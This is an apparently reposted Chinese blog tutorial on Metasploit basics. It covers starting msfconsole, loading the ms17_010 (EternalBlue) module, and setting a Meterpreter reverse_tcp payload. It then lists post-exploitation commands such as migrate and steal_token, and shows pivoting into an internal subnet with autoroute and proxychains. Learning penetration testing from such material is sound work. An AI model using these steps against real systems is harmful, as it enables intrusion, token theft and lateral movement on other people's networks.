其他分享
首页 > 其他分享> > msf使用基础

msf使用基础

作者:互联网

前言

msf是后渗透神奇,在kali中已经内置有。

1.1 基础使用
metasploit程序需要使用postgresql数据库

手动启动数据库:

service postgresql start

设置成开机启动数据库:

systemctl enable postgresql

启动msf

msfconsole

1.2.查找模块

search 模块名
//比如我要找永恒之蓝 search ms17_010

在这里插入图片描述
使用那个模块 use 模块名或use 前面的数字都可以
在这里插入图片描述在这里插入图片描述
1.3使用模块

#查看要设置的参数
show options
#查看模块详情
info
#设置载荷  有很多可以自行选择
 set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#运行模块
run 或者 exploit

在这里插入图片描述
在这里插入图片描述
1.4.命令行模式的一些基础操作
输入help可以查看支持的操作,但是乱码了,莫慌,可以解决。
在这里插入图片描述
输入 chcp 65001
在这里插入图片描述
乱码没有了

核心后台脚本:

​		bgkill       关闭一个后台的meterpreter脚本

​		bglist	   列出所有正在运行的后台脚本

​		bgrun	   将一个meterpreter脚本以后台线程模式运行

​		channel   显示或者控制一个活动频道

​		close 		关闭一个频道

​		exit			终止meterpreter会话

​		get_timeouts	获得当前会话的timeout值

		getuid			查看当前权限

​		help			帮助菜单

​		info 			显示post模块信息

​		irb				进入ruby脚本模式

​		load			加载meterpreter扩展

​		migrate	   将会话迁移到一个指定PID的进程

​		quit			 结束meterpreter会话

​		read			从频道中读取数据

​		resource	运行文件中的命令

​		run 			执行一个meterpreter脚本或者post模块

​		sessions    快速地切换到另一个会话

​		background	切换到后台

		run checkvm  查看是否是虚拟机

		steal_token 伪造身份

伪造身份:
在这里插入图片描述
2.1实战演示

在这里插入图片描述

添加攻击IP添加到目标机路由表中

也可以 run autoroute -s 10.10.10.0/24

或者手动添加

route add 10.10.10.0 255.255.255.0

接下来用kali上的神奇proxychains

vi /etc/proxychains.conf

在这里插入图片描述
测试是否能连内网的机器
在这里插入图片描述
可以成功连接
通过代理工具开启msf
在这里插入图片描述
接下来就可以直接搞内网了。实战中可能有多层网段。就需要挂多层代理

msf中有很多 攻击载荷模块,嗅探模块和后渗透模块。大家后期可以深入的去研究研究。

标签:脚本,run,基础,会话,模块,使用,msf,meterpreter
来源: https://blog.csdn.net/qq_46804551/article/details/116381087